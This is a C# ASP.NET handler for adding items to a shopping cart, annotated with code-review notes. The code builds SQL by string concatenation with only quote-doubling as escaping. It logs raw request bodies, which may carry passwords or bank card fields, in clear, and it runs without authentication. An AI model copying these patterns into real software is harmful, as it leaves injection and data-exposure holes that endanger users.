<%@ WebHandler Language="C#" Class="AjAddCart" %>
using System;
using System.Collections.Generic;
using System.Linq;
using System.Data;
using System.Data.OleDb;
using System.Configuration;
using System.Collections;
//using System.Data.Objects;
//using System.Data.Entity.Core.Objects;
using System.Data.Entity;
using System.Xml;
using System.Xml.Linq;
using System.Web;
using System.Web.Security;
using System.Web.UI;
using System.Web.UI.WebControls;
using System.Web.UI.WebControls.WebParts;
using System.Web.UI.HtmlControls;

using System.Text;
using System.IO;
using System.Net;
//using HtmlTextFormat;
using System.Diagnostics;
using System.Threading;

using System.Web.Services;
using System.Web.Script.Serialization;



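/// <summary>
/// HTTP handler that reads a JSON-like request body, logs it, and, when the body
/// carries an <c>id</c> together with a <c>quantity</c> of "1", adds that item to
/// the cart encoded in <c>_token</c> and writes the updated cart back as JSON.
/// </summary>
/// <remarks>
/// Review notes for maintainers:
/// - The handler performs no authentication or caller allow-listing before it
///   touches the log file or the database.
/// - The raw request body is written to a log file and to the wbw_eLog table, and
///   every response (including the cart token) is written to the same log file.
///   The field parser below recognises "password", "token" and "bankcard", so such
///   values would be stored in clear if a client sends them.
///   NOTE(review): confirm that gs_root + "APA/" is not a directory IIS will serve.
/// - No Content-Type is set on the response; the original behaviour is kept.
/// </remarks>
public class AjAddCart : IHttpHandler
{
    public string[] l_temp = new string[20];
    ICEClass icObj = new ICEClass();

    /// <summary>
    /// Handles one request: disables caching, reads the body, logs it, parses the
    /// fields and, if an item id and a quantity of "1" are present, adds the item to the cart.
    /// </summary>
    /// <param name="context">The current HTTP context; the body is read from its input stream.</param>
    public void ProcessRequest(HttpContext context)
    {
        string ret2 = "";
        string FilePath = icObj.gs_root + "APA/";

        context.Response.AppendHeader("Cache-Control", "no-cache, must-revalidate, max-age=0");
        context.Response.AppendHeader("Expires", "Thu, 01 Jan 1970 00:00:01 GMT");
        context.Response.AppendHeader("Pragma", "no-cache");

        string xml_text;
        using (StreamReader reader = new StreamReader(context.Request.InputStream))
        {
            xml_text = reader.ReadToEnd();
        }

        string l_wbw = "";
        try
        {
            // Everything before the first '{' is discarded; a body without one is not parsed at all.
            int l_wbw_i = xml_text.IndexOf('{');
            if (l_wbw_i < 0)
            {
                // NOTE(review): this is a fixed sample cart, returned unlogged to any request whose
                // body has no '{'. It looks like a leftover test stub; confirm whether clients rely
                // on it before removing. Kept byte-for-byte to preserve behaviour.
                ret2 = @"{""Token"": ""KsVLir43BPP3qWoYoWd8882f8oQ75KL8UBuZiiE4yVGIXczQt8882fcmFAoq6kd9wwDPJAk1PI0BdRjy8xENAdrhHdaCKDEigdmR1u7iahcPbZfiFJlcOIO8882bGCJH2UuAH8882bnDZg5cuhW4CfZiGvrhkXtRmrdaiFGF2KS7hmz7wab8882bm0o2wXH9Di1RLR8882bDWaub41eMZXz3rlLtzOhyjU0Z7ydFpm3h3cP39sGUja3TF0iIv8dDilaYnals7kBqrh96TJsYBRu5H6hAJtKElVtLZCMhEktcwzFWIoFxz8882b378882fNJRV8MGBRWCdQal78882fsuxW8sufVKbeptjwB8882f8882bstGuLeB1JVDnz6Y8882fRilEGZl67eKi7cXJx2wKy64FskIZrmKc21AvwNqZZ16w0sHtSWYH2SxWp8882beSj5tcQVx3Aun9gBIl8882f8882foltX0tgc8883d"", ""RVA"": ""115"", ""CC"": ""MYR"", ""Cart"": [  { ""EUP"": 1, ""Qty"": 1, ""Price"": 45, ""Cur"":""MYR"", ""Img"":""82"", ""Imgfile"":""821"", ""Desc"":""NH-02 MACA OLIGO Fruit Juice (13sachets X7g)"" } , { ""EUP"": 7, ""Qty"": 1, ""Price"": 45, ""Cur"":""MYR"", ""Img"":""84"", ""Imgfile"":""841"", ""Desc"":""NH-08 Alfalfa chlorophyll + Honey (24 sacs x 5g)"" } , { ""EUP"": 22, ""Qty"": 1, ""Price"": 25, ""Cur"":""MYR"", ""Img"":""26"", ""Imgfile"":""261"", ""Desc"":""SG-10 Natural Make Up Remover Cream (90ml)"" }  ] }";

                context.Response.Write(ret2);
                return;
            }

            l_wbw = xml_text.Substring(l_wbw_i);
        }
        catch (Exception)
        {
            // Best-effort, as in the original: any failure here ends the request with an empty body.
            return;
        }

        string[] l_Request = new string[50];
        f_requestlog(FilePath, xml_text);
        f_requestdata(l_wbw, ref l_Request);

        // Slot 42 = "id", 43 = "quantity", 41 = "_token" (see f_requestdata).
        // Only a quantity of exactly "1" triggers an add; anything else yields an empty response.
        if (l_Request[42] != null && l_Request[43] == "1")
        {
            ret2 = AddCCart(l_Request[42], l_Request[41], l_Request[43]);
        }

        // The response, which contains the cart token, is appended to the same log file as the request.
        icObj.WriteMyFile("cvv", FilePath, icObj.ICDateTime(0).Substring(0, 11), ret2);
        context.Response.Write(ret2);
    }

    /// <summary>Always false: a new handler instance is created for each request.</summary>
    public bool IsReusable
    {
        get
        {
            return false;
        }
    }

    /// <summary>
    /// Adds one unit of an item to the cart carried in <paramref name="_token"/> and
    /// returns the updated cart as a JSON string with a re-encrypted token.
    /// </summary>
    /// <param name="id">Item identifier taken from the request.</param>
    /// <param name="_token">Encrypted cart state supplied by the client; decrypted with xxa_DecryptURL2.</param>
    /// <param name="quantity">Not used: the quantity added is fixed at "1".</param>
    /// <returns>JSON text with the keys Token, RVA, CC and Cart.</returns>
    // NOTE(review): [WebMethod] normally applies to .asmx services and page methods; on an
    // .ashx handler it appears to have no effect. Confirm before relying on it.
    [WebMethod]
    public static string AddCCart(string id, string _token, string quantity)
    {
        string l_Json = "";
        ICEClass lcObj = new ICEClass();

        double gd_Total = 0;
        double gd_Cash = 0;
        double gd_RVA = 0;
        double gd_KG = 0;
        int gl_Count = 0;

        string ls_Country = "WM";
        string ls_Qty = "1";
        string ls_ItemID = id;
        string l_Lang = "EN";
        string l_MYR = "MYR";

        // NOTE(review): _token is client-controlled. Whether xxa_DecryptURL2 authenticates it
        // (rather than only decrypting) cannot be seen from here; verify in ICEClass.
        string l_StrQtr = lcObj.xxa_DecryptURL2(_token, "");
        l_StrQtr = lcObj.f_AddItem(l_Lang, ls_ItemID, ls_Qty, l_StrQtr, ls_Country, ref gd_Total, ref gd_Cash, ref gd_RVA, ref gd_KG, ref gl_Count, ref l_Json);

        // The first character of the item list is dropped (presumably a leading separator
        // written by f_AddItem; confirm). Guarded so an empty list no longer throws.
        string l_Items = string.IsNullOrEmpty(l_Json) ? "" : l_Json.Substring(1);

        l_Json = @"{ ""Token"": """ + lcObj.xxa_EncryptURL2(l_StrQtr, "") + @""", ""RVA"": """ + lcObj.VarStr(gd_RVA.ToString() , 2) + @""", ""CC"": """ + l_MYR + @""", ""Cart"": [ " + l_Items + @" ] }";

        return l_Json;
    }

    /// <summary>
    /// Appends the raw request body to the log file and inserts it into wbw_eLog,
    /// split across Subject1/Subject2 in pieces of at most 250 characters
    /// (anything beyond 500 characters is not stored in the table).
    /// </summary>
    /// <param name="FilePath">Directory passed to WriteMyFile for the file log.</param>
    /// <param name="xml_text">Raw request body; untrusted.</param>
    /// <returns>The value returned by fs_Last for wbw_eLog/TransID.</returns>
    public string f_requestlog(string FilePath, string xml_text)
    {
        string a_Trdid = "";
        string a_Trhid = "";
        string a_Trsid = "";

        try
        {
            icObj.WriteMyFile("cvv", FilePath, icObj.ICDateTime(0).Substring(0, 11), xml_text);
        }
        catch
        {
            // Best-effort: a failed file write must not stop the database log below.
        }

        string l_ll = icObj.fs_Last("wbw_eLog", "TransID", ref a_Trdid, ref a_Trhid, ref a_Trsid);

        // NOTE(review): the trsid column receives a_Trdid and a_Trsid is never used. This looks
        // like a copy-paste slip but is left unchanged because stored data depends on it.
        // l_ll, a_Trdid and a_Trhid come from fs_Last, not from the request, and are embedded unquoted.
        string l_Head = l_ll + " + 1, " + a_Trdid + ", " + a_Trhid + ", " + a_Trdid + ", #" + icObj.ICDateTime(0) + "# , 0,  'SET' , '";

        if (xml_text.Length > 250)
        {
            // Slice first, escape second, so the stored pieces keep their 250-character limit.
            string l_Subject1 = EscapeSqlLiteral(xml_text.Substring(0, 250));
            string l_Subject2 = EscapeSqlLiteral(xml_text.Substring(250, Math.Min(250, xml_text.Length - 250)));

            icObj.ExecSQL(0, "insert into wbw_eLog(transid, trdid, trhid, trsid, trdate, Amount, RefNo, Subject1, Subject2 ) values (" + l_Head + l_Subject1 + "', '" + l_Subject2 + "' ) ");
        }
        else
        {
            icObj.ExecSQL(0, "insert into wbw_eLog(transid, trdid, trhid, trsid, trdate, Amount, RefNo, Subject1 ) values (" + l_Head + EscapeSqlLiteral(xml_text) + "' ) ");
        }

        return l_ll;
    }

    /// <summary>
    /// Doubles single quotes so that request text cannot terminate the quoted SQL
    /// literal it is embedded in.
    /// </summary>
    // The only database entry point visible here is ExecSQL(int, string). If ICEClass offers a
    // parameterised command, prefer that over string building.
    private static string EscapeSqlLiteral(string value)
    {
        return value == null ? "" : value.Replace("'", "''");
    }

    /// <summary>
    /// Splits the body on ',' and each piece on ':' and copies recognised field values
    /// into fixed slots of <paramref name="l_Request"/>.
    /// </summary>
    /// <param name="l_wbw">Request body starting at its first '{'.</param>
    /// <param name="l_Request">Target array; indices up to 43 are written, so it needs at least 44 elements.</param>
    /// <returns>Always "1".</returns>
    /// <remarks>
    /// This is not a JSON parser: a value containing ',' or ':' is cut at that character,
    /// and quotes and braces are replaced with spaces before trimming. "username", "sign"
    /// and "amount" are each stored in two slots.
    /// </remarks>
    public string f_requestdata(string l_wbw, ref string[] l_Request)
    {
        foreach (string l_Pair in l_wbw.Split(','))
        {
            // "::" guarantees at least two parts even when the piece has no ':'.
            string[] l_Parts = (l_Pair + "::").Split(':');

            string l_Field = l_Parts[0].Replace("\"", " ").Replace("{", " ").Trim();
            string l_Data = l_Parts[1].Replace("\"", " ").Replace("}", " ").Trim();
            l_Field = l_Field.Replace("'", " ").Trim();
            l_Data = l_Data.Replace("'", " ").Trim();

            switch (l_Field)
            {
                case "command": l_Request[1] = l_Data; break;
                case "sign": l_Request[2] = l_Data; l_Request[30] = l_Data; break;
                case "transaction_id": l_Request[3] = l_Data; break;
                case "username": l_Request[4] = l_Data; l_Request[29] = l_Data; break;
                case "password": l_Request[5] = l_Data; break;
                case "token": l_Request[6] = l_Data; break;
                case "amount": l_Request[7] = l_Data; l_Request[32] = l_Data; break;
                case "out_trade_no": l_Request[8] = l_Data; break;
                case "version": l_Request[9] = l_Data; break;
                case "mt4": l_Request[10] = l_Data; break;
                case "currency_id": l_Request[11] = l_Data; break;
                case "tr_code": l_Request[12] = l_Data; break;
                case "remark": l_Request[13] = l_Data; break;
                case "balance": l_Request[14] = l_Data; break;
                case "member_name": l_Request[15] = l_Data; break;
                case "sponsor_id": l_Request[16] = l_Data; break;
                case "ic_number": l_Request[17] = l_Data; break;
                case "gender": l_Request[18] = l_Data; break;
                case "email": l_Request[19] = l_Data; break;
                case "phone": l_Request[20] = l_Data; break;
                case "country": l_Request[21] = l_Data; break;
                case "address": l_Request[22] = l_Data; break;
                case "ac1": l_Request[23] = l_Data; break;
                case "ab1": l_Request[24] = l_Data; break;
                case "ac2": l_Request[25] = l_Data; break;
                case "ab2": l_Request[26] = l_Data; break;
                case "date_from": l_Request[27] = l_Data; break;
                case "date_to": l_Request[28] = l_Data; break;
                case "bankcard": l_Request[31] = l_Data; break;
                case "lang": l_Request[33] = l_Data; break;
                case "voucher": l_Request[34] = l_Data; break;
                case "rva": l_Request[35] = l_Data; break;
                case "cash": l_Request[36] = l_Data; break;
                case "qtr": l_Request[37] = l_Data; break;
                case "shipping": l_Request[38] = l_Data; break;
                case "postcode": l_Request[39] = l_Data; break;
                case "city": l_Request[40] = l_Data; break;
                case "_token": l_Request[41] = l_Data; break;
                case "id": l_Request[42] = l_Data; break;
                case "quantity": l_Request[43] = l_Data; break;
            }
        }

        return "1";
    }
}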
